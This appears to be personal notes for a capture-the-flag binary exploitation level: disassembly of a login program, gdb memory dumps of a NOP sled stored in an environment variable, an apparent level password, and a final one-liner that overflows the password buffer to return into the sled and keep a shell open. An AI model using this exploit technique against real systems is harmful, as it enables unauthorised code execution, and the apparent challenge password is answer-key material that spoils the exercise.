08048464 <verify_user_name>:
 8048464:       55                      push   %ebp
 8048465:       89 e5                   mov    %esp,%ebp
 8048467:       57                      push   %edi
 8048468:       56                      push   %esi
 8048469:       83 ec 10                sub    $0x10,%esp
 804846c:       c7 04 24 90 86 04 08    movl   $0x8048690,(%esp)
 8048473:       e8 08 ff ff ff          call   8048380 <puts@plt>
 8048478:       ba 40 a0 04 08          mov    $0x804a040,%edx
 804847d:       b8 a8 86 04 08          mov    $0x80486a8,%eax
 8048482:       b9 07 00 00 00          mov    $0x7,%ecx
 8048487:       89 d6                   mov    %edx,%esi
 8048489:       89 c7                   mov    %eax,%edi
 804848b:       f3 a6                   repz cmpsb %es:(%edi),%ds:(%esi)
 804848d:       0f 97 c2                seta   %dl
 8048490:       0f 92 c0                setb   %al
 8048493:       89 d1                   mov    %edx,%ecx
 8048495:       28 c1                   sub    %al,%cl
 8048497:       89 c8                   mov    %ecx,%eax
 8048499:       0f be c0                movsbl %al,%eax
 804849c:       83 c4 10                add    $0x10,%esp
 804849f:       5e                      pop    %esi
 80484a0:       5f                      pop    %edi
 80484a1:       5d                      pop    %ebp
 80484a2:       c3                      ret

080484a3 <verify_user_pass>:
 80484a3:       55                      push   %ebp
 80484a4:       89 e5                   mov    %esp,%ebp
 80484a6:       57                      push   %edi
 80484a7:       56                      push   %esi
 80484a8:       8b 45 08                mov    0x8(%ebp),%eax
 80484ab:       89 c2                   mov    %eax,%edx
 80484ad:       b8 b0 86 04 08          mov    $0x80486b0,%eax
 80484b2:       b9 05 00 00 00          mov    $0x5,%ecx
 80484b7:       89 d6                   mov    %edx,%esi
 80484b9:       89 c7                   mov    %eax,%edi
 80484bb:       f3 a6                   repz cmpsb %es:(%edi),%ds:(%esi)
 80484bd:       0f 97 c2                seta   %dl
 80484c0:       0f 92 c0                setb   %al
 80484c3:       89 d1                   mov    %edx,%ecx
 80484c5:       28 c1                   sub    %al,%cl
 80484c7:       89 c8                   mov    %ecx,%eax
 80484c9:       0f be c0                movsbl %al,%eax
 80484cc:       5e                      pop    %esi
 80484cd:       5f                      pop    %edi
 80484ce:       5d                      pop    %ebp
 80484cf:       c3                      ret

080484d0 <main>:
 80484d0:       55                      push   %ebp
 80484d1:       89 e5                   mov    %esp,%ebp
 80484d3:       57                      push   %edi
 80484d4:       53                      push   %ebx
 80484d5:       83 e4 f0                and    $0xfffffff0,%esp
 80484d8:       83 ec 60                sub    $0x60,%esp << cretion d'un buff 96 octer 
 80484db:       8d 5c 24 1c             lea    0x1c(%esp),%ebx
 80484df:       b8 00 00 00 00          mov    $0x0,%eax
 80484e4:       ba 10 00 00 00          mov    $0x10,%edx
 80484e9:       89 df                   mov    %ebx,%edi
 80484eb:       89 d1                   mov    %edx,%ecx
 80484ed:       f3 ab                   rep stos %eax,%es:(%edi)
 80484ef:       c7 44 24 5c 00 00 00    movl   $0x0,0x5c(%esp)
 80484f6:       00
 80484f7:       c7 04 24 b8 86 04 08    movl   $0x80486b8,(%esp)
 80484fe:       e8 7d fe ff ff          call   8048380 <puts@plt>
 8048503:       b8 df 86 04 08          mov    $0x80486df,%eax
 8048508:       89 04 24                mov    %eax,(%esp)
 804850b:       e8 50 fe ff ff          call   8048360 <printf@plt>
 8048510:       a1 20 a0 04 08          mov    0x804a020,%eax
 8048515:       89 44 24 08             mov    %eax,0x8(%esp)
 8048519:       c7 44 24 04 00 01 00    movl   $0x100,0x4(%esp)
 8048520:       00
 8048521:       c7 04 24 40 a0 04 08    movl   $0x804a040,(%esp)
 8048528:       e8 43 fe ff ff          call   8048370 <fgets@plt>
 804852d:       e8 32 ff ff ff          call   8048464 <verify_user_name>
 8048532:       89 44 24 5c             mov    %eax,0x5c(%esp)
 8048536:       83 7c 24 5c 00          cmpl   $0x0,0x5c(%esp)
 804853b:       74 13                   je     8048550 <main+0x80>
 804853d:       c7 04 24 f0 86 04 08    movl   $0x80486f0,(%esp)
 8048544:       e8 37 fe ff ff          call   8048380 <puts@plt>
 8048549:       b8 01 00 00 00          mov    $0x1,%eax
 804854e:       eb 5f                   jmp    80485af <main+0xdf>
 8048550:       c7 04 24 0d 87 04 08    movl   $0x804870d,(%esp)
 8048557:       e8 24 fe ff ff          call   8048380 <puts@plt>
 804855c:       a1 20 a0 04 08          mov    0x804a020,%eax
 8048561:       89 44 24 08             mov    %eax,0x8(%esp)
 8048565:       c7 44 24 04 64 00 00    movl   $0x64,0x4(%esp)
 804856c:       00
 804856d:       8d 44 24 1c             lea    0x1c(%esp),%eax
 8048571:       89 04 24                mov    %eax,(%esp)
 8048574:       e8 f7 fd ff ff          call   8048370 <fgets@plt>
 8048579:       8d 44 24 1c             lea    0x1c(%esp),%eax
 804857d:       89 04 24                mov    %eax,(%esp)
 8048580:       e8 1e ff ff ff          call   80484a3 <verify_user_pass>
 8048585:       89 44 24 5c             mov    %eax,0x5c(%esp)
 8048589:       83 7c 24 5c 00          cmpl   $0x0,0x5c(%esp)
 804858e:       74 07                   je     8048597 <main+0xc7>
 8048590:       83 7c 24 5c 00          cmpl   $0x0,0x5c(%esp)
 8048595:       74 13                   je     80485aa <main+0xda>
 8048597:       c7 04 24 1e 87 04 08    movl   $0x804871e,(%esp)
 804859e:       e8 dd fd ff ff          call   8048380 <puts@plt>
 80485a3:       b8 01 00 00 00          mov    $0x1,%eax
 80485a8:       eb 05                   jmp    80485af <main+0xdf>
 80485aa:       b8 00 00 00 00          mov    $0x0,%eax
 80485af:       8d 65 f8                lea    -0x8(%ebp),%esp
 80485b2:       5b                      pop    %ebx
 80485b3:       5f                      pop    %edi
 80485b4:       5d                      pop    %ebp
 80485b5:       c3                      ret


login :  dat_wil
passwd : admin


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBCCCCDDDDEEEEFF


PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv



0xffffdb26:      "SC=\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...
0xffffdbee:      "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"

x/500xb 0xffffdb26


0xffffdb26:     0x53    0x43    0x3d    0x90    0x90    0x90    0x90    0x90
0xffffdb2e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb36:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb3e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb46:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb4e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb56:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb5e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb66:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb6e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb76:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb7e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb86:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb8e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb96:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdb9e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdba6:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbae:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbb6:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbbe:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbc6:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbce:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbd6:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90 << addr utiliser  pour  le glissement 
0xffffdbde:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbe6:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbee:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbf6:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdbfe:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc06:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc0e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc16:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc1e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc26:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc2e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc36:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc3e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc46:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc4e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc56:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc5e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc66:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc6e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc76:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc7e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc86:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc8e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc96:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdc9e:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdca6:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffdcae:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90



\xd6\xdb\xff\xff

# Attention a ne pas oublier  le cat  sinon le shell ne reste pas ouvert :D 


(python -c 'print("dat_wil")'; python -c 'print("A"*80+ "\xd6\xdb\xff\xff")' ;  cat ) | ./level01